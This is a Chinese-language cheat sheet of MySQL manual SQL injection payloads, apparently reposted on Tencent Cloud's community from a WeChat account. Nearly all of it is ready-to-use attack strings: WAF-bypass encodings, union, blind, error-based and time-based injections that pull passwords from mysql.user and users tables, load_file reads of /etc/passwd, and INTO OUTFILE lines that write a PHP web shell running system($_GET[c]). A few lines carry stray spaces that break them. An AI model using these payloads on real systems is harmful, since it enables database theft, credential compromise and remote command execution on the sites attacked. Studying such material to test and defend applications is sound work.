Mysql 手工注入速查表 | 建议收藏
绕 WAF
过滤空格:
+,%2B,%20,%09,%0d,%0A,/**/,/*tuns*/使用 like、IN、NOT IN 替换 =:
script.php?par=1 and substring(Version(),1,1)like(5)
script.php?par=1 and substring(Version(),1,1)not in(4,3)
script.php?par=1 and substring(Version(),1,1)in(4,3)使用 substring 函数:
script.php?par=1 and right(left(version(),1),1)=5
script.php?par=1 and left(version(),1)=4
script.php?par=1 and ascii(lower(substr(Version(),1,1)))=51
script.php?par=1 and (select mid(version(),1,1)=4)无需空格之盲注:
script.php?par=(1)and(lower(substring((select(pass)from(mysql.user)where(user="user")),1,1))='b')
script.php?par='1'and(exists(select(1)from(users)where(ascii(lower(substring(user_id,1,1))))like(50) ))and'1'<'2'无需空格之联合注入:
script.php?par=a')union(select'1',2,table_name,(4) from(information_schema.tables))%23
script.php?par=(-1)union(select(table_name),2,3,4,5,(6)from(informa tion_schema.tables))/*无需逗号之盲注:
script.php?par=1 and substring((select password from user where Host='localhost') FROM 1 FOR 1)>'f'
script.php?par=1 and mid((select password from user where Host='localhost') FROM 1 FOR 1)>'f'
script.php?par=(1)and(case when ascii(substring((select password from user limit 1 offset 0) from 1 for 1))>100 then 1 else (select 1 union select 2)end)无需逗号联合注入:
script.php?par=1 union select 1/*!,*/2/*!,*/3/*!,*/4/*!,*/5/*!,*/6--大小写绕过:
script.php?par=1 uNion SeLect 1WAF 绕过:
script.php?par=1/*!limit+0+union+select+version()+from+tables*/
# %0D%0A
/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
# /*!0
hUserId=22768&FromDate=1&ToDate=1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-&sendbutton1=Get+Statement
#
news.php?id=1+un/**/ion+se/**/lect+1,2,3--
# 大小写绕过
news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
# 二次过滤
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
# URL编码
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--数据库名字中的连字符:
script.php?par=1 union select version() from `db-forum`.forum_user绕过 magic_quotes (双重查询):
script.php?par=-1 union select 1,2,0x2D3120756E696F6E2073656C656374202731272F2A,4 ,5,6,7,8,9,10,11,12,13/*2D3120756E696F6E2073656C656374202731272F2A ==> -1 union select '1'/*连接字符串:
select * from users where name = 'te'+'st';
select * from users where name = 'te'='st';
"1"'2'"3" '1'"2"'3'注释符
/* 多行 最后使用过 */ 结尾
- 单行 后面必须跟 空格
# 单行 (%23)
系统变量
@@basedir
@@datadir
@@tmpdir
@@version_compile_os
@@version_comment - MySQL 服务器的当前版本。
@@version_compile_machine - 编译此版本 MySQL 服务器的架构类型
@@log_error 错误日志路径
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()group_concat 输出内容
查找字段:
group_concat (concat_ws) (0x3a, table_sche table_name, column_name)) + from + information_schema.columns + where + column_name + like + '% qwe%'获取前一百字段:
mid(group_concat(concat_ws(0x3a,table_schema,table _name,column_name)),100,1024),2,3,4,5,6+from+information_schema.columns获取表名:
group_concat(table_name)+from+information_schema.tables+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61获取除系统表外的其他表:
group_concat(table_name+order+by+1)+from+information_schema.tables+where+table_schema!='information_schema'
group_concat(table_name+order+by+1)+from+information_schema.tables+where+table_schema!='information_schema'+and+table_name>'last_table'盲注,字符匹配:
group_concat(table_name)+from+information_schema.tables+where+ASCII(LOWER(table_name))=99使用 limit 获取表名:
group_concat(table_name)+from+infor mation_schema.tables+group+by+table_schema+limit+1 ,1分列显示
group_concat(concat_ws(0x3a,user,password,file_priv))+from+mysql.user+group+by+file_priv+limit+1,1使用编码函数
script.php?par=1 union select cast(version()+as+binary)
script.php?par=1 union select convert(version(),binary)
script.php?par=1 union select convert(version()+using+latin1)
script.php?par=1 union select convert(version()+using+binary)
script.php?par=1 union select aes_decrypt(aes_encrypt(version(),1),1)
script.php?par=1 union select unhex(hex(version()))报错注入
name_const (MySQL 5.0.12 > 5.0.64)
(select name_const((select 1),1)) - true
script.php?par=1 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a)
script.php?par=1 union select * from(select * from(select NAME_CONST((select column_name from information_schema.columns limit 1), 14)d) as t join (select NAME_CONST((select column_name from information_schema.columns limit 1), 14)e) b)a--ExtractValue (MySQL 5.1>=)
script.php?par=1 AND extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))
==>
XPATH syntax error: ':200820e3227815ed1756a6b531e7e0d'rand (Mysql >= 4.1)
script.php?par=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from TABLE group by x)a)--
script.php?par=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
script.php?par=1 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--
script.php?par=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select pass from users limit 1),1,64),floor(rand(0)*2)))--
script.php?par=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
script.php?par=1 union select 1,2,passwd from users where id=1 and row(1,1)>(select count(*),concat( (select users.passwd) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --查询列名
MySQL >= 4.1
# Select
script.php?par=(1)and(SELECT * from xek.users)=(1)
==>
Operand should contain 4 column(s)
script.php?par=1 and (1,2,3,4) = (SELECT * from xek.users UNION SELECT 1%0,2,3,4 LIMIT 1)
==>
Column 'id' cannot be null
# Insert、Update、Replace
INSERT INTO table (`a`,`b`,`c`) VALUES ('1',if(1=1,NULL,'2'),'3')
Column 'name' cannot be nullMySQL 5
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
==>
#1060 - Duplicate column name 'id'
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
==>
#1060 - Duplicate column name 'name'
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
PROCEDURE ANALYZE()
script.php? par = 1 limit 0,1 PROCEDURE ANALYZE()没有列名的数据查询
MySql => 4.1.х
script.php?par=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
script.php?par=-1 union select * from users,(select 1)a
script.php?par=-1 union select * from users,(select 1,2)a
script.php?par=-1 union select * from users,(select 1,2,3)a
.....
script.php?par=-1 union select * from users,(select 1,2,3,4,5,6,7,8,9)a
script.php?par=-1 union select * from (select 1,2,3,4,5)b,users,(select 1,2,3,4)a
script.php?par=-1 union select * from (select 1,2,3,4)b,users,(select 1,2,3,4,5)a
script.php?par=-1 union select * from (select 1,2,3)b,users,(select 1,2,3,4,5,6)a
script.php?par=-1 union select * from (select 1,2)b,users,(select 1,2,3,4,5,6,7)a
script.php?par=-1 union select * from (select 1)b,users,(select 1,2,3,4,5,6,7,8)aMySql =>4.0
script.php?par=1 union select *,1,2,3,4,5,6 from users
script.php?par=1 union select 6,users.*,2,3,4,5,1 from usersOrder 注入
# 盲注:
script.php?par=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))
# (ExtractValue)
script.php?par=id,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
# (rand)
script.php?par=(select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2 limit 1)a)--
# (name_const)
script.php?par=(select*from(select name_const(version(),1),name_const(version(),1))a)limit 注入
script.php?par=1,111111111 union select version(),2,3,4--
script.php?par=111111111 union select version(),2,3,4--时间盲注
script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --文件权限
读文件
script.php?par=1 and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+
# 绕过读取文件超过 64 字符的情况
?lol=123'+and+(select+1+from+(select+count(0),concat((select+mid(load_file('/etc/passwd'),1,64),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)
?lol=123'+and+(select+1+from+(select+count(0),concat((select+mid(load_file('/etc/passwd'),65,128),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)写文件
script.php?par=1 limit 1 into outfile '/path/to/shell.php' lines terminated by "<?php system($_GET[c]);?>"--+
script.php?par=1 limit 1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by "<?php system($_GET[c]);die();?>"--+防御过滤
+, -, =, &, |, &&, ||, <=>, <=, >=, !=, <>, ^, *, <<, >>, <>, %, /, <, >, or not, and not, div, xor, or, and漏洞检测
/?s=1
/?s[]=1
/?s=[1]
/?s=1\
/?s=1/' /
/?s=1/!1111'/本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-08-26,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。